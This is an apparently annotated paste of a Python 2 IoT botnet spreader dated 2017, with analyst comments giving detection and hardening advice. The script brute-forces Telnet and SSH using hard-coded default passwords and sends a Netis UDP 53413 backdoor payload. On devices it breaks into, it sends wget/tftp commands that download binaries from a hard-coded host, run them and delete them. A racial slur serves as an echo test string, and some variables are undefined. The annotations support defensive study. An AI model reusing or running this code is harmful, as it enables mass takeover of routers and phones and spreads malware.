
Untitled

a guest
Apr 16th, 2017
  1. #!/usr/bin/python
  2. """
  3. phones
  4. By; DRe
  5. """
  6. import threading, sys, time, random, socket, re, os, paramiko
  7. from Queue import *
  8. from sys import stdout
  9.  
  # Argument check: the usage string names two arguments, a thread count and a
  # path to a list file. With fewer than two arguments the script prints the
  # usage line and exits.
  10. if len(sys.argv) < 3:
  11. print "Usage: python "+sys.argv[0]+" <threads> <list>"
  12. sys.exit()
  13.  
  # Analyst note: hard-coded credential material used by the Telnet and SSH
  # threads defined later in this listing. usernames[i] is paired with
  # passwords[i] by index in ttelnet.run(); ssh_passwords holds "user:password"
  # entries that sssh.run() splits on ":". loginpayload is the first datagram
  # nnetis.run() sends to UDP port 53413. A device that still accepts any of
  # these pairs is exposed to this script; the strings are also usable as match
  # content when reviewing honeypot, Telnet/SSH authentication and IDS logs.
  14. # USER AND PASS LISTS #
  15. usernames = ["root", "admin", "root", "root"] #DONT CHANGE
  16. passwords = ["oelinux123", "admin", "Zte521", "vizxv"] #DONT CHANGE
  17. ssh_passwords = ["admin:1234", "root:1234"] #CAN CHANGE
  18. loginpayload = "AAAAAAAAnetcore\x00" #DONT CHANGE
  19.  
  20.  
  # Analyst note (indicators): all three strings point at the same hard-coded
  # host, 207.154.203.163, reached over HTTP and, as a fallback, TFTP. `command`
  # embeds a shell sequence that changes to /var, fetches a file named sshd,
  # marks it executable with chmod 777, runs it and deletes it.
  # The address is the one given in this paste (dated Apr 16th, 2017); who
  # operates it today cannot be told from the listing. For detection: outbound
  # HTTP or TFTP from an embedded device to this host, or a
  # fetch / chmod 777 / execute / delete sequence in a device shell, indicates
  # compromise.
  21. # START CONFIGURATION #
  22. url = "http://207.154.203.163/tftp" # ARM4 Binary
  23. sh = "http://207.154.203.163/bins.sh" # SH File
  24. command = "AA\x00\x00AAAA cd /var/; rm -rf sshd; wget http://207.154.203.163/sshd || tftp -r sshd -g 207.154.203.163; chmod 777 sshd; ./sshd; rm -rf sshd\x00" # MIPSEL Binary
  25.  
  # Runtime state shared by the threads defined later in this listing.
  26. # DONT TOUCH
  27. spawn_shell = "cat | sh"
  # Sends paramiko's log output to /dev/null, so the SSH attempts leave no local log.
  28. paramiko.util.log_to_file("/dev/null") #quiets paramiko output
  # Number of worker threads, taken from the first command-line argument.
  29. threads = int(sys.argv[1])
  # Every line of the list file named by the second argument; each thread class
  # strips the trailing newline in its __init__.
  30. ips = open(sys.argv[2], "r").readlines()
  # The three services contacted per target: Telnet (23), SSH (22) and UDP 53413.
  31. ports = ["23", "22", "53413"]
  32. queue = Queue()
  33. qcount = 0
  # `binary` ends up as the fourth "/"-separated component of `url`.
  34. binary = url.split("/")
  35. binary = binary[3]
  36. ip = binary[2]
  37. found = 0
  38. count = 0
  39.  
  # Put every line read from the list file on the work queue, rewriting a
  # progress counter on a single console line as it goes. Indentation was lost
  # in this paste, so whether the final print sits inside the loop cannot be
  # confirmed from the listing.
  40. for ip in ips:
  41. qcount += 1
  42. stdout.write("\r[%d] Added to queue" % qcount)
  43. stdout.flush()
  44. queue.put(ip)
  45. print "\n"
  46.  
  # Accumulate data from socket `tn` in chunks of up to 1024 bytes until
  # `string` appears in the buffer, then return everything read so far.
  # Raises Exception('TIMEOUT!') once `timeout` seconds (default 10) have
  # elapsed. The deadline is only checked between recv() calls, so a blocking
  # recv() is bounded by the socket's own timeout rather than by this one.
  47. def readUntil(tn, string, timeout=10):
  48. buf = ''
  49. start_time = time.time()
  50. while time.time() - start_time < timeout:
  51. buf += tn.recv(1024)
  52. time.sleep(0.01)
  53. if string in buf: return buf
  54. raise Exception('TIMEOUT!')
  55.  
  # Queue consumer run by each worker thread. For every address taken from the
  # queue it starts three threads against that address: sssh (SSH, TCP 22),
  # ttelnet (Telnet, TCP 23) and nnetis (UDP 53413), then marks the item done.
  # When the queue is empty it calls sys.exit(1). Both bare except clauses
  # discard every exception.
  # For detection: one source contacting TCP 22, TCP 23 and UDP 53413 on the
  # same host within moments of each other is the network footprint of this loop.
  56. def worker():
  57. try:
  58. while True:
  59. try:
  60. if queue.empty() == True:
  61. sys.exit(1)
  62. ip = queue.get()
  63. ss = sssh(ip)
  64. ss.start()
  65. tt = ttelnet(ip)
  66. tt.start()
  67. nn = nnetis(ip)
  68. nn.start()
  69. queue.task_done()
  70. except:
  71. pass
  72. except:
  73. pass
  74.  
  # Analyst note: one thread per target that attempts a Telnet (TCP 23) login
  # with factory-default credentials and, if the reply looks like a shell
  # prompt, sends a download-and-execute command line. Indentation was lost in
  # this paste, so the exact nesting of the branches cannot be confirmed from
  # the listing.
  # Defensive takeaways: do not expose Telnet to untrusted networks, replace
  # factory-default passwords, and alert on Telnet sessions in which a login is
  # followed directly by wget/tftp, chmod 777, execution and deletion under
  # /tmp or /var.
  75. class ttelnet(threading.Thread):
  76. def __init__ (self, ip):
  77. threading.Thread.__init__(self)
  # Target address with the trailing newline from the list file removed.
  78. self.ip = str(ip).rstrip('\n')
  79. def run(self):
  80. try:
  81. tn = socket.socket()
  82. tn.settimeout(5)
  83. tn.connect((self.ip,23))
  84. time.sleep(0.2)
  85. hoho = ''
  # Stage 1: read the login banner up to the first ":" and choose a credential
  # pair from substrings found in it ("mdm9625", "9615-cdp", "ogin", "(none)",
  # "BCM"); the chosen username is sent immediately.
  86. hoho += readUntil(tn, ":")
  87. if "mdm9625" in hoho:
  88. r00t = 0
  89. username = usernames[1]
  90. password = passwords[1]
  91. tn.send(username + "\n")
  92. elif "9615-cdp" in hoho:
  93. r00t = 1
  94. username = usernames[0]
  95. password = passwords[0]
  96. tn.send(username + "\n")
  97. elif "ogin" in hoho and "9615-cdp" not in hoho:
  98. zte = 1
  99. username = usernames[2]
  100. password = passwords[2]
  101. tn.send(username + "\n")
  102. elif "ogin" in hoho and "mdm9625" not in hoho:
  103. zte = 1
  104. username = usernames[2]
  105. password = passwords[2]
  106. tn.send(username + "\n")
  107. if "(none)" in hoho:
  108. zte = 0
  109. vizxv = 1
  110. username = usernames[3]
  111. password = passwords[3]
  112. tn.send(username + "\n")
  113. if "BCM" in hoho:
  114. zte = 0
  115. vizxv = 0
  116. BCM = 1
  117. username = usernames[1]
  118. password = passwords[1]
  119. tn.send(username + "\n")
  # Any failure in stage 1 closes the socket.
  120. except Exception:
  121. tn.close()
  # Stage 2: wait for the next ":"-terminated prompt and send the password if
  # the text contains "assword", then pause three seconds.
  122. try:
  123. hoho = ''
  124. hoho += readUntil(tn, ":")
  125. if "assword" in hoho:
  126. tn.send(password + "\n")
  127. time.sleep(3)
  128. except Exception:
  129. tn.close()
  # Stage 3: read once more; a reply containing "#", "$", "~", ">" or "root@"
  # is treated as a shell prompt. One command line is then sent per device flag
  # set in stage 1. Each of them fetches a file from the hard-coded host, makes
  # it executable, runs it and removes it; the "not r00t" branch first sends
  # "su" and a second hard-coded password.
  130. try:
  131. mp = ''
  132. mp += tn.recv(1024)
  133. if "#" in mp or "$" in mp or "~" in mp or ">" in mp or "root@" in mp: # !DO NOT CHANGE ANYTHING! #
  134. if r00t: tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  135. if not r00t: tn.send("su" + "\n"); readUntil(tn, "Password:"); tn.send(passwords[0] + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+url+" -O phone; chmod 777 phone; ./phone; rm -rf phone" + "\n"); print "\033[32m[PHONE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  136. if zte: tn.send("cd /var/; rm -rf busybox filename; wget "+url+" -O filename ; cp /bin/busybox ./; busybox cat filename > busybox;./busybox ;rm -rf busybox filename" + "\n"); print "\033[32m[ZTE] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  137. if vizxv: tn.send("cd /var/ || cd /tmp/ || cd /; tftp -r "+binary+" -g "+ip+"; chmod 777 "+binary+"; ./"+binary+"; rm -rf "+binary+""); print "\033[32m[VIZXV] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  138. if BCM: tn.send(spawn_shell + "\n"); time.sleep(1); tn.send("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*" + "\n"); print "\033[32m[BCM] command sent %s!\033[37m"%(self.ip); time.sleep(8); tn.close()
  # Any exception raised in stage 3 is swallowed after the socket is closed.
  139. except Exception:
  140. tn.close()
  141. pass
  142.  
  # Analyst note: one thread per target that attempts to send two UDP datagrams
  # to port 53413 without waiting for any reply: first `loginpayload`, then,
  # after a one-second pause, a second datagram. Every exception is swallowed.
  # UDP 53413 is the port publicly documented for the Netis/Netcore router
  # backdoor, and the "netcore" marker inside loginpayload is consistent with
  # that; the listing itself only says "netis" in the author's comment.
  # Defensive takeaways: drop inbound UDP 53413 at the WAN edge, apply the
  # vendor firmware update where one exists, and alert on datagrams to that
  # port that carry the "netcore" string.
  143. class nnetis(threading.Thread):
  144. def __init__ (self, ip):
  145. threading.Thread.__init__(self)
  # Target address with the trailing newline from the list file removed.
  146. self.ip = str(ip).rstrip('\n')
  147. def run(self):
  148. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  149. try:
  150. # sends netis payload to almost everything lmao
  151. s.sendto(loginpayload, (self.ip, 53413))
  152. time.sleep(1)
  153. s.sendto(commandpayload, (self.ip, 53413))
  154. time.sleep(2)
  155. except Exception:
  156. pass
  157.  
  # Analyst note: one thread per target that tries each "user:password" entry
  # of ssh_passwords against SSH on TCP 22 (five-second timeout) through
  # paramiko; an "n/a" field stands for an empty username or password. Host
  # keys are accepted without verification (AutoAddPolicy). After a successful
  # login it runs an echo command and checks that the echoed text comes back,
  # presumably to skip hosts that accept the login but do not really execute
  # commands. Only then does it send a command line that downloads a shell
  # script into /tmp, runs it and deletes everything under /tmp. The bare
  # except clauses swallow every exception. Indentation was lost in this paste,
  # so the nesting described here is inferred.
  # Defensive takeaways: disable password logins for root and admin over SSH,
  # remove default passwords, and alert on an SSH exec request that contains
  # wget ... -O l.sh followed by sh l.sh.
  158. class sssh(threading.Thread):
  159. def __init__ (self, ip):
  160. threading.Thread.__init__(self)
  # Target address with the trailing newline from the list file removed.
  161. self.ip = str(ip).rstrip('\n')
  162. def run(self):
  163. x = 1
  164. while x != 0:
  165. try:
  166. username='root'
  167. password="0"
  168. port = 22
  169. ssh = paramiko.SSHClient()
  170. ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
  171. dobreak=False
  # Credential loop: stops at the first pair the server accepts.
  172. for passwd in ssh_passwords:
  173. if ":n/a" in passwd:
  174. password=""
  175. else:
  176. password=passwd.split(":")[1]
  177. if "n/a:" in passwd:
  178. username=""
  179. else:
  180. username=passwd.split(":")[0]
  181. try:
  182. ssh.connect(self.ip, port = port, username=username, password=password, timeout=5)
  183. dobreak=True
  184. break
  185. except:
  186. pass
  187. if True == dobreak:
  188. break
  # Echo test: the host is kept only if the echoed marker appears in the output.
  189. badserver=True
  190. stdin, stdout, stderr = ssh.exec_command("echo nigger")
  191. output = stdout.read()
  192. if "nigger" in output:
  193. badserver=False
  194. if badserver == False:
  195. print "\033[36m[SSH] command sent %s!\033[37m"%(self.ip)
  196. ssh.exec_command("cd /tmp; wget "+sh_file+" -O l.sh; sh l.sh; rm -rf /tmp/*")
  197. time.sleep(3)
  198. ssh.close()
  199. if badserver == True:
  200. ssh.close()
  201. except:
  202. pass
  203. x = 0
  204.  
  # Start `threads` daemon threads running worker(), block until every queued
  # address has been marked done with task_done(), then print a completion
  # message.
  205. for g in xrange(threads):
  206. t = threading.Thread(target=worker)
  207. t.setDaemon(True)
  208. t.start()
  209.  
  210. queue.join()
  211. print "Finished!"